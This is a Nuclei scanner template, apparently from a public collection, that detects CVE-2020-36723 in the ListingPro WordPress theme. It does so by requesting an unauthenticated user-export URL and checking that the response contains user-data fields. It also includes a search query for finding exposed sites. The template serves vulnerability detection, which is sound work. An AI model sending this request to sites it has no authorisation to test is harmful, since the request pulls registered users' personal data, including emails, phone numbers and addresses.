id: CVE-2020-36723

info:
  name: ListingPro < 2.6.1 - Sensitive Data Disclosure
  author: ritikchaddha
  severity: high
  description: |
    The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.
  impact: |
    Unauthenticated attackers can extract sensitive user data including usernames, email addresses, phone numbers, and physical addresses from all registered users.
  remediation: |
    Upgrade to ListingPro version 2.6.1 or later.
  reference:
    - https://wpscan.com/vulnerability/096e6e16-c14d-42da-8ba3-c271db3385a4/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36723
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-36723
    epss-score: 0.01608
    epss-percentile: 0.72756
    cwe-id: CWE-200
    cpe: cpe:2.3:a:cridio:listingpro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cridio
    product: listingpro
    fofa-query: body="/wp-content/plugins/listingpro"
  tags: cve,cve2020,wordpress,wp-plugin,wp,exposure,listingpro,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/index.php?download-lp-users=yes"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "UserName"
          - "Email"
          - "Full Name"
          - "Listings"
        condition: and

      - type: word
        part: header
        words:
          - "filename="

      - type: status
        status:
          - 200
# digest: 490a0046304402201d019dee9dad0aa8805ad9495905e268fdf58eaa6c8f0eed158715ad2cd44cdb0220635047926d8d69e619af5673b532f4265904917193292a326125fc66e15ceb5c:922c64590222798bb761d5b6d8e72950